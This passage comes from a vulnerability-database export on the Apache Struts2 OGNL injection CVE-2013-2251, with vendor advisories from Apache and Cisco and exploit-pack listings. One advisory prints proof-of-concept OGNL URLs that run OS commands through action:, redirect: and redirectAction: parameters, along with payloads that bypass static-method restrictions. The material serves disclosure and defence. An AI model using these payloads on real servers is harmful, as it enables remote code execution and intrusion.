Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nApache Archiva is affected by a vulnerability in the version of the Struts library being used, which allows a malicious user to run code on the server remotely. More details about the vulnerability can be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "[SECURITY] CVE-2013-2251: Apache Archiva Remote Command Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30568", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30568", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nCVE-2013-2251: Apache Continuum affected by Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Continuum 1.3.1 to Continuum 1.4.1\r\n\r\nDescription:\r\nApache Continuum is affected by a vulnerability in the version of the Struts library being used,\r\nwhich allows a malicious user to run code on the server remotely. More details about the vulnerability\r\ncan be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Continuum 1.4.2, which is not affected\r\nby this issue.\r\n\r\nReferences:\r\nhttp://continuum.apache.org/security.html\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-06-14T00:00:00", "title": "[SECURITY] CVE-2013-2251: Apache Continuum affected by Remote Command Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30825", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:48", "description": "\r\n\r\nCVE Number: CVE-2013-2251\r\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\r\nAffected Software: Apache Struts v2.0.0 - 2.3.15\r\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\r\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\r\nIssue ID by Vender: S2-016\r\n\r\nOverview:\r\n Struts2 is an open-source web application framework for Java.\r\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\r\n leads to arbitrary Java method execution on the target server. This is\r\n caused by insecure handling of prefixed special parameters (action:,\r\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\r\n\r\nDetails:\r\n <About DefaultActionMapper>\r\n\r\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\r\n request and action to be executed on the server. DefaultActionMapper is\r\n a default implementation of ActionMapper. It handles four types of\r\n prefixed parameters: action:, redirect:, redirectAction: and method:.\r\n\r\n For example, redirect prefix is used for HTTP redirect.\r\n\r\n Normal redirect prefix usage in JSP:\r\n <s:form action="foo">\r\n ...\r\n <s:submit value="Register"/>\r\n <s:submit name="redirect:http://www.google.com/" value="Cancel"/>\r\n </s:form>\r\n\r\n If the cancel button is clicked, redirection is performed.\r\n\r\n Request URI for redirection:\r\n /foo.action?redirect:http://www.google.com/\r\n\r\n Resopnse Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/\r\n\r\n Usage of other prefixed parameters is similar to redirect.\r\n See Struts2 document for details.\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n <How the Attack Works>\r\n\r\n As stated already, there are four types of prefixed parameters.\r\n\r\n action:, redirect:, redirectAction:, method:\r\n\r\n All except for method: can be used for attacks. But regarding action:,\r\n it can be used only if wildcard mapping is enabled in configuration.\r\n On the one hand, redirect: and redirectAction: are not constrained by\r\n configuration (thus they are convenient for attackers).\r\n\r\n One thing that should be noted is that prefixed parameters are quite\r\n forceful. It means that behavior of application which is not intended\r\n to accept prefixed parameters can also be overwritten by prefixed\r\n parameters added to HTTP request. Therefore all Struts2 applications\r\n that use DefaultActionMapper are vulnerable to the attack.\r\n\r\n The injection point is name of prefixed parameters.\r\n Example of attack using redirect: is shown below.\r\n\r\n Attack URI:\r\n /bar.action?redirect:http://www.google.com/%25{1000-1}\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/999\r\n\r\n As you can see, expression (1000-1) is evaluated and the result (999)\r\n is appeared in Location response header. As I shall explain later,\r\n more complex attacks such as OS command execution is possible too.\r\n\r\n In DefaultActionMapper, name of prefixed parameter is once stored as\r\n ActionMapping object and is later executed as OGNL expression.\r\n Rough method call flow in execution phase is as the following.\r\n\r\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\r\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\r\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\r\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\r\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\r\n\r\nProof of Concept:\r\n <PoC URLs>\r\n\r\n PoC is already disclosed on vender's web page.\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n Below PoC URLs are just quotes from the vender's page.\r\n\r\n Simple Expression:\r\n http://host/struts2-blank/example/X.action?action:%25{3*4}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\n\r\n OS Command Execution:\r\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n\r\n Obviously such attacks are not specific to blank/showcase application,\r\n but all Struts2 based applications may be subject to attacks.\r\n\r\n <OS Command Execution and Static Method Call>\r\n\r\n Another topic that I think worth mentioning is that PoC URLs use\r\n ProcessBuilder class to execute OS commands. The merit of using this\r\n class is that it does not require static method to execute OS commands,\r\n while Runtime class does require it.\r\n\r\n As you may know, static method call in OGNL is basically prohibited.\r\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\r\n a simple trick:\r\n\r\n %{#_memberAccess['allowStaticMethodAccess']=true,\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\r\n prevent the trick. However there are still some techniques to call\r\n static method in OGNL.\r\n\r\n One technique is to use reflection to replace static method call to\r\n instance method call. Another technique is to overwrite #_memberAccess\r\n object itself rather than property of the object:\r\n\r\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n Probably prevention against static method is just an additional layer\r\n of defense, but I think that global objects such as #_memberAccess\r\n should be protected from rogue update.\r\n\r\nTimeline:\r\n 2013/06/24 Reported to Struts Security ML\r\n 2013/07/17 Vender announced v2.3.15.1\r\n 2013/08/10 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Immediate upgrade to the latest version is strongly recommended as\r\n active attacks have already been observed. It should be noted that\r\n redirect: and redirectAction: parameters were completely dropped and\r\n do not work in the latest version as stated in the vender's page.\r\n Thus attention for compatibility issues is required for upgrade.\r\n\r\n If you cannot upgrade your Struts2 immediately, filtering (by custom\r\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\r\n this vulnerability. Some points about filtering solution are listed\r\n below.\r\n\r\n - Both %{expr} and ${expr} notation can be used for attacks.\r\n - Parameters both in querystring and in request body can be used.\r\n - redirect: and redirectAction: can be used not only for Java method\r\n execution but also for open redirect.\r\n\r\n See S2-017 (CVE-2013-2248) for open redirect issue.\r\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\r\n\r\nReference:\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2013-09-09T00:00:00", "title": "Struts2 Prefixed Parameters OGNL Injection Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29766", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29766", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:51:29", "description": "Authentication bypass, code execution.", "edition": 2, "cvss3": {}, "published": "2013-10-28T00:00:00", "title": "Cisco Identity Services Engine multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2251", "CVE-2013-5531", "CVE-2013-5530"], "modified": "2013-10-28T00:00:00", "id": "SECURITYVULNS:VULN:13378", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13378", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:37", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-2540", "CVE-2014-1854", "CVE-2014-2729", "CVE-2014-2654", "CVE-2014-2579", "CVE-2014-2736", "CVE-2014-0111", "CVE-2014-2042", "CVE-2014-1907", "CVE-2013-2251", "CVE-2014-2219", "CVE-2014-2340", "CVE-2014-1217", "CVE-2014-1906", "CVE-2014-2737", "CVE-2014-1946", "CVE-2014-1905", "CVE-2014-2983", "CVE-2013-2187", "CVE-2014-2875", "CVE-2014-2383", "CVE-2014-0166", "CVE-2014-1945", "CVE-2014-2024", "CVE-2014-1908", "CVE-2014-1517", "CVE-2014-2715", "CVE-2014-0472", "CVE-2014-1944"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:VULN:13714", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13714", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:48:39", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2013-09-09T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-3214", "CVE-2013-4879", "CVE-2013-1435", "CVE-2013-4998", "CVE-2013-2248", "CVE-2013-4900", "CVE-2013-4160", "CVE-2013-5589", "CVE-2013-4996", "CVE-2013-4152", "CVE-2013-4173", "CVE-2013-2251", "CVE-2013-5588", "CVE-2013-4898", "CVE-2013-4789", "CVE-2013-4880", "CVE-2013-4276", "CVE-2013-4899", "CVE-2013-5003", "CVE-2013-4249", "CVE-2013-4624", "CVE-2013-2136", "CVE-2013-3213", "CVE-2013-4717", "CVE-2013-5216", "CVE-2013-5000", "CVE-2013-1434", "CVE-2013-2653", "CVE-2013-4626", "CVE-2013-3212", "CVE-2013-5002", "CVE-2013-4995", "CVE-2013-3215"], "modified": "2013-09-09T00:00:00", "id": "SECURITYVULNS:VULN:13263", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13263", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:19", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-06-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-3946", "CVE-2014-3781", "CVE-2014-2575", "CVE-2014-3945", "CVE-2014-2987", "CVE-2014-2303", "CVE-2014-3414", "CVE-2014-3947", "CVE-2014-2554", "CVE-2014-3948", "CVE-2014-3944", "CVE-2014-3137", "CVE-2014-3740", "CVE-2013-2251", "CVE-2014-3877", "CVE-2014-3446", "CVE-2014-3943", "CVE-2014-3941", "CVE-2014-3210", "CVE-2014-1402", "CVE-2014-0228", "CVE-2014-3415", "CVE-2014-0130", "CVE-2014-2577", "CVE-2014-3875", "CVE-2014-3942", "CVE-2014-3783", "CVE-2013-7106", "CVE-2014-2233", "CVE-2014-2843", "CVE-2014-3447", "CVE-2013-7107", "CVE-2014-3749", "CVE-2014-0081", "CVE-2014-2232", "CVE-2014-1855", "CVE-2014-1878", "CVE-2014-2302", "CVE-2014-0082", "CVE-2014-3876", "CVE-2014-2553", "CVE-2014-3782", "CVE-2014-2386", "CVE-2014-3966", "CVE-2013-5954", "CVE-2014-0107", "CVE-2014-3448", "CVE-2013-7108", "CVE-2014-2988", "CVE-2014-3445", "CVE-2014-3949"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:VULN:13836", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13836", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:15", "description": "Quarterly update fixes over 130 vulnerabilities in different products.", "edition": 2, "cvss3": {}, "published": "2013-12-09T00:00:00", "title": "Oracle / Sun / MySQL / PeopleSoft applications multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-3792", "CVE-2012-2750", "CVE-2013-5856", "CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5846", "CVE-2013-5818", "CVE-2013-3839", "CVE-2013-5779", "CVE-2013-5807", "CVE-2013-4002", "CVE-2013-3831", "CVE-2013-5850", "CVE-2013-3840", "CVE-2013-5778", "CVE-2013-3827", "CVE-2013-3833", "CVE-2013-5867", "CVE-2013-3828", "CVE-2013-3785", "CVE-2013-5862", "CVE-2013-5762", "CVE-2013-3766", "CVE-2013-2172", "CVE-2013-5776", "CVE-2013-5827", "CVE-2013-5788", "CVE-2013-5765", "CVE-2013-5773", "CVE-2013-3841", "CVE-2013-5842", "CVE-2013-2251", "CVE-2013-3836", "CVE-2013-5836", "CVE-2013-5810", "CVE-2013-3762", "CVE-2013-5830", "CVE-2013-5859", "CVE-2013-5832", "CVE-2013-5864", "CVE-2013-5841", "CVE-2013-5845", "CVE-2013-5813", "CVE-2013-3814", "CVE-2013-5763", "CVE-2013-5839", "CVE-2013-5784", "CVE-2013-5792", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-3838", "CVE-2013-5771", "CVE-2011-3389", "CVE-2013-5787", "CVE-2013-3835", "CVE-2013-5852", "CVE-2013-3834", "CVE-2013-5828", "CVE-2013-5854", "CVE-2013-5768", "CVE-2013-5806", "CVE-2013-0149", "CVE-2013-5805", "CVE-2013-5826", "CVE-2013-5857", "CVE-2013-5825", "CVE-2013-5811", "CVE-2013-5789", "CVE-2013-5822", "CVE-2013-5823", "CVE-2013-5837", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5769", "CVE-2013-5865", "CVE-2013-5780", "CVE-2013-3842", "CVE-2013-5761", "CVE-2013-5791", "CVE-2013-5816", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5847", "CVE-2013-5799", "CVE-2013-5814", "CVE-2013-5798", "CVE-2013-5766", "CVE-2013-5775", "CVE-2013-5863", "CVE-2013-5829", "CVE-2013-5786", "CVE-2013-5803", "CVE-2013-5844", "CVE-2013-5796", "CVE-2013-5861", "CVE-2013-5781", "CVE-2013-5835", "CVE-2013-3826", "CVE-2013-5819", "CVE-2013-5770", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5767", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-3832", "CVE-2013-5793", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-3837", "CVE-2013-5838", "CVE-2013-5794", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5866", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772", "CVE-2013-5815"], "modified": "2013-12-09T00:00:00", "id": "SECURITYVULNS:VULN:13423", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13423", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:15", "description": "Quarterly CPU fixed over 170 different vulnerabilities.", "edition": 2, "cvss3": {}, "published": "2015-07-20T00:00:00", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1926", "CVE-2015-4000", "CVE-2015-2591", "CVE-2015-0443", "CVE-2015-1803", "CVE-2015-4771", "CVE-2015-2627", "CVE-2015-2615", "CVE-2014-3566", "CVE-2015-4764", "CVE-2015-4774", "CVE-2015-2601", "CVE-2015-4738", "CVE-2015-0235", "CVE-2015-4729", "CVE-2015-4751", "CVE-2015-0444", "CVE-2015-0445", "CVE-2015-4749", "CVE-2015-4758", "CVE-2014-7809", "CVE-2015-2643", "CVE-2015-4770", "CVE-2015-4747", "CVE-2015-2661", "CVE-2015-4778", "CVE-2015-2632", "CVE-2015-2625", "CVE-2015-2617", "CVE-2015-4784", "CVE-2015-2664", "CVE-2015-2605", "CVE-2015-2597", "CVE-2015-4785", "CVE-2015-4732", "CVE-2015-2653", "CVE-2014-0227", "CVE-2015-2595", "CVE-2015-4782", "CVE-2015-0286", "CVE-2015-2648", "CVE-2015-2657", "CVE-2014-0230", "CVE-2015-4789", "CVE-2015-0447", "CVE-2015-2581", "CVE-2015-2613", "CVE-2015-2658", "CVE-2014-3571", "CVE-2015-4736", "CVE-2015-2599", "CVE-2013-2251", "CVE-2013-5704", "CVE-2015-4739", "CVE-2015-4790", "CVE-2015-2589", "CVE-2010-1324", "CVE-2015-2623", "CVE-2015-2631", "CVE-2015-2596", "CVE-2015-4763", "CVE-2015-4783", "CVE-2015-2620", "CVE-2015-2650", "CVE-2015-0448", "CVE-2015-2654", "CVE-2015-2607", "CVE-2015-2639", "CVE-2015-2611", "CVE-2015-2645", "CVE-2015-2634", "CVE-2015-2594", "CVE-2015-3456", "CVE-2015-2584", "CVE-2015-2808", "CVE-2014-3570", "CVE-2015-2590", "CVE-2015-2656", "CVE-2015-2626", "CVE-2015-2628", "CVE-2015-4768", "CVE-2015-4761", "CVE-2015-4745", "CVE-2015-4750", "CVE-2015-2635", "CVE-2015-4756", "CVE-2015-2647", "CVE-2015-2600", "CVE-2015-2580", "CVE-2015-3152", "CVE-2015-2640", "CVE-2015-4733", "CVE-2015-2646", "CVE-2014-1568", "CVE-2015-2651", "CVE-2015-2603", "CVE-2015-2633", "CVE-2015-4765", "CVE-2015-2660", "CVE-2015-2604", "CVE-2015-0255", "CVE-2015-4772", "CVE-2015-2662", "CVE-2015-4735", "CVE-2015-4779", "CVE-2015-2585", "CVE-2013-2186", "CVE-2014-3567", "CVE-2015-2614", "CVE-2015-4766", "CVE-2015-4737", "CVE-2015-4776", "CVE-2015-4757", "CVE-2015-4728", "CVE-2015-2637", "CVE-2015-2606", "CVE-2015-4769", "CVE-2015-2621", "CVE-2015-4786", "CVE-2015-4787", "CVE-2015-2638", "CVE-2015-4740", "CVE-2015-2619", "CVE-2015-4731", "CVE-2015-4727", "CVE-2015-4741", "CVE-2015-2636", "CVE-2015-2659", "CVE-2015-2655", "CVE-2015-4775", "CVE-2015-4773", "CVE-2014-8102", "CVE-2015-4746", "CVE-2015-2629", "CVE-2015-4788", "CVE-2015-4755", "CVE-2015-2602", "CVE-2015-4748", "CVE-2015-2622", "CVE-2015-2610", "CVE-2012-0036", "CVE-2015-2663", "CVE-2015-4742", "CVE-2015-2652", "CVE-2015-4759", "CVE-2015-0446", "CVE-2015-2582", "CVE-2015-4780", "CVE-2014-1569", "CVE-2015-4781", "CVE-2015-2618", "CVE-2015-2641", "CVE-2015-2593", "CVE-2015-4744", "CVE-2015-2598", "CVE-2015-2587", "CVE-2015-2630", "CVE-2015-2592", "CVE-2015-4767", "CVE-2015-2616", "CVE-2015-2624", "CVE-2015-2609", "CVE-2015-4777", "CVE-2015-4754", "CVE-2015-2588", "CVE-2015-4760", "CVE-2015-2583", "CVE-2015-4743", "CVE-2015-4752", "CVE-2015-2586", "CVE-2015-4753", "CVE-2015-2649", "CVE-2015-2612", "CVE-2015-2644"], "modified": "2015-07-20T00:00:00", "id": "SECURITYVULNS:VULN:14601", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14601", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2022-06-05T10:04:30", "description": "Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability. \n\nThe vulnerability is due to insufficient sanitization of user-supplied\ninput. An attacker could exploit this vulnerability by sending crafted requests\nconsisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An\nexploit could allow the attacker to execute arbitrary code on the targeted system. \n\nCisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000. Cisco Business Edition 3000 customers should contact their Cisco representative for available options.\n\nWorkarounds that mitigate this vulnerability are not available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2\"]", "cvss3": {}, "published": "2013-10-23T16:00:00", "type": "cisco", "title": "Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2015-10-12T12:30:00", "id": "CISCO-SA-20131023-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-05T10:05:05", "description": "Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability identified by Apache with Common Vulnerabilities and Exposures ID CVE-2010-1870.\n\nThe vulnerability is due to insufficient sanitization on user-supplied input in the XWorks component of the affected software. The component uses the ParameterInterceptors directive to parse the Object-Graph Navigation Language (OGNL) expressions that are implemented via a whitelist feature. An attacker could exploit this vulnerability by sending crafted requests that contain OGNL expressions to an affected system. An exploit could allow the attacker to execute arbitrary code on the targeted system.\n\nCisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000 Series. Customers using Cisco Business Edition 3000 Series should contact their Cisco representative for available options.\n\nCisco has released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available. This advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140709-struts2 [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140709-struts2\"]", "cvss3": {}, "published": "2014-07-09T16:00:00", "type": "cisco", "title": "Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2014-12-17T18:47:00", "id": "CISCO-SA-20140709-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140709-struts2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "canvas": [{"lastseen": "2021-07-28T14:33:39", "description": "**Name**| struts2_default_action_mapper \n---|--- \n**CVE**| CVE-2013-2251 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Apache Struts 2.0.0 - 2.3.15 RCE \n**Notes**| References: https://cwiki.apache.org/confluence/display/WW/S2-016 \nRepeatability: Infinite \nVENDOR: Apache \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251 \nCVE Name: CVE-2013-2251 \n\n", "edition": 3, "cvss3": {}, "published": "2013-07-20T03:37:00", "title": "Immunity Canvas: STRUTS2_DEFAULT_ACTION_MAPPER", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-20T03:37:00", "id": "STRUTS2_DEFAULT_ACTION_MAPPER", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/struts2_default_action_mapper", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:36", "edition": 3, "description": "**Name**| strutsCodeInjection \n---|--- \n**CVE**| CVE-2012-0394 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Struts Code Injector \n**Notes**| CVE Name: CVE-2012-0394 \nVENDOR: Apache \nNotes: \nCVE-2012-0394 \n\\- Struts <= 2.2.1.1 (ExceptionDelegator) \n \nWhen an exception occurs while applying parameter values to properties, the \nvalue is evaluated as OGNL expression which can be abused to accomplish Java code execution. \n \n\\- Struts <= 2.3.1 (CookieInterceptor) \n \nAgain an OGNL expression can be abused to accomplish arbitrary Java code execution \nby means of a crafted cookie. \n \nCVE-2010-1870 \n\\- Struts <= 2.2.0 (Xworks filter bypass) \nUnicode characters can be used to bypass character restrictions on OGNL expressions. \n \n \nRepeatability: Infinite \nReferences: \nCVE-2012-0394 \nhttp://struts.apache.org/2.x/docs/s2-008.html \nhttps://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt \n \nCVE-2010-1870 \nhttp://seclists.org/fulldisclosure/2010/Jul/183 \nhttp://struts.apache.org/2.2.1/docs/s2-005.html \n \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0394 \nCompatibility: \nStruts <= 2.2.1.1 (ExceptionDelegator) \nStruts <= 2.3.1 (CookieInterceptor) \nStruts <= 2.2.0 (XworksFilterBypass) \n \n\n", "cvss3": {}, "published": "2012-01-08T15:55:00", "type": "canvas", "title": "Immunity Canvas: STRUTSCODEINJECTION", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2012-0394"], "modified": "2012-01-08T15:55:00", "id": "STRUTSCODEINJECTION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/strutsCodeInjection", "cvss": {"score": 6.8, "vector": 